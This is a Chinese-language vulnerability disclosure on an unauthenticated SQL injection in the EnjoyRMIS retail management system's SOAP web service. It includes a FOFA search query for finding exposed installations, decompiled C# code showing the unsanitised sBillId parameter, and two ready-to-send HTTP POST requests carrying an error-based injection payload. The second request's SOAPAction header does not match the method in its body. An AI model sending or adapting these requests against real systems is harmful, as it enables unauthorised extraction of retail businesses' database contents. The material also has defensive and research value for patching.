漏洞简介
EnjoyRMIS系统是由深圳市昂捷信息技术股份有限公司开发的一款面向零售行业的管理信息系统,旨在为超市、便利店、百货、购物中心及专营专卖等零售业态提供全面的数字化解决方案和服务。EnjoyRMIS系统的 /EnjoyRMIS_WS/WS/Approve/cwsapprove.asmx 接口存在SQL注入漏洞,未经身份验证的攻击者可以通过该漏洞获取数据库敏感信息。
fofa语法
body="/Scripts/EnjoyMsg.js"
漏洞分析
直接看 GetApproveDataXML 方法的实现
[WebMethod]
public string GetApproveDataXML(string sBillId, string sContentType)
{
this.Init(sContentType);
return this._cda.GetBillXml(sBillId);
}
public override string GetBillXml(string sId)
{
string billXml = "";
Dictionary<string, string> dictionary = new Dictionary<string, string>();
string str = DBHelperManager.Instance.EnjoyDBType == DBType.Sql ? "(nolock)" : "";
if (!string.IsNullOrEmpty(this.ApproveTableName))
dictionary.Add(this.ApproveTableName, string.Format("select a.* from {0} a{2} where a.c_id='{1}';", (object) this.ApproveTableName, (object) sId, (object) str));
if (!string.IsNullOrEmpty(this.ApproveTableDetailName))
dictionary.Add(this.ApproveTableDetailName, string.Format("select b.* from {0} b{2} where b.c_id='{1}';", (object) this.ApproveTableDetailName, (object) sId, (object) str));
if (dictionary.Count > 0)
sBillId 无任何过滤校验直接拼接到SQL语句中执行,造成SQL注入漏洞。
漏洞复现
GetApproveDataXML
POST /EnjoyRMIS_WS/WS/Approve/cwsapprove.asmx HTTP/1.1
SOAPAction: http://tempuri.org/GetApproveDataXML
Host: enjoyrmis.mrxn.net
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetApproveDataXML>
<!--type: string-->
<tem:sBillId>'and 1=@@version--</tem:sBillId>
<!--type: string-->
<tem:sContentType>1</tem:sContentType>
</tem:GetApproveDataXML>
</soapenv:Body>
</soapenv:Envelope>

GetApproveBrief
POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
SOAPAction: http://tempuri.org/GetOCashById
Content-Type: text/xml;charset=UTF-8
Host: enjoyrmis.mrxn.net
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetApproveBrief>
<!--type: string-->
<tem:sBillId>'and 1=@@version--</tem:sBillId>
<!--type: string-->
<tem:sContentType>1</tem:sContentType>
</tem:GetApproveBrief>
</soapenv:Body>
</soapenv:Envelope> 
